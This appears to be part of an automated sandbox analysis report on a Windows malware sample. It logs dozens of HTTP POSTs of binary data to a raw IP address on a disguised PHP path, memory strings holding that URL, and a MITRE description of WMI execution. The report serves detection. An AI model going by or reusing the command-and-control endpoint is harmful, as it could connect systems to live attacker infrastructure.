Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1380Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1396Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive

Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77.91.124.101
Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr
Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://77.91.1H
Source: BlockrefBrokerperf.exe, 00000005.00000002.2209540037.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101
Source: unknown	TCP traffic detected without corresponding DNS query: 77.91.124.101

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

